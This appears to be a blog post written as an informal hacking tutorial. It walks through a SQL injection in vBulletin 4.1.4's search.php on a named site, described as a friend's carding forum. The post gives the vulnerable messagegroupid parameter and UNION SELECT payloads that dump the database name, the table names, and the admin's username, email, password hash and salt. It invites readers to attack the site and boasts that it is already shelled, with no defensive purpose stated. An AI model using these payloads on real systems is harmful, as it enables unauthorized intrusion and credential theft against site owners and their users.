http://www.optikal-market.com/
yeh its my mates CC forum that was shit so he don't use, its 4.1.4.
so make an acc or whatever... ill be using my acc admin
once you make an acc go to group.php:
http://optikal-market.com/group.php
for this if their is already a group their you don't need to make one.
remember the group id when you hover over join group here it is 1
join the group and make a discussion called anything for me its awesome1337
so know what you must remember:
the groupid you joined = 1
the discussion you made in that group = awesome1337
So now go to search.php
http://www.optikal-market.com/search.php
and do this:
tick group messages
tick exact name
search awesome1337
like so:
http://www.img.lc/i/selection0.png
open http headers tick capture and then on the target search!
when the url is loaded go to your http headers and there should be something like this:
http://www.img.lc/i/selectjvj.png
click the one that is highlighted in my pic, and click the replay button.
then there should be something like this:
http://www.img.lc/i/selectxux.png
now this is the crucial injection data
ill break it down
vulnerable param:messagegroupid
nulling param:messagegroupid[0]
=1: groupid
union select blah blah: injection
so heres the full code for all a certain admin pass
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
for my site its from vb_user
because i made the tables like that.
most sites are just: user
some sites are different so use your brain to get the tables
hack the site if you want lol I already shelled it anyway
No comments:
Post a Comment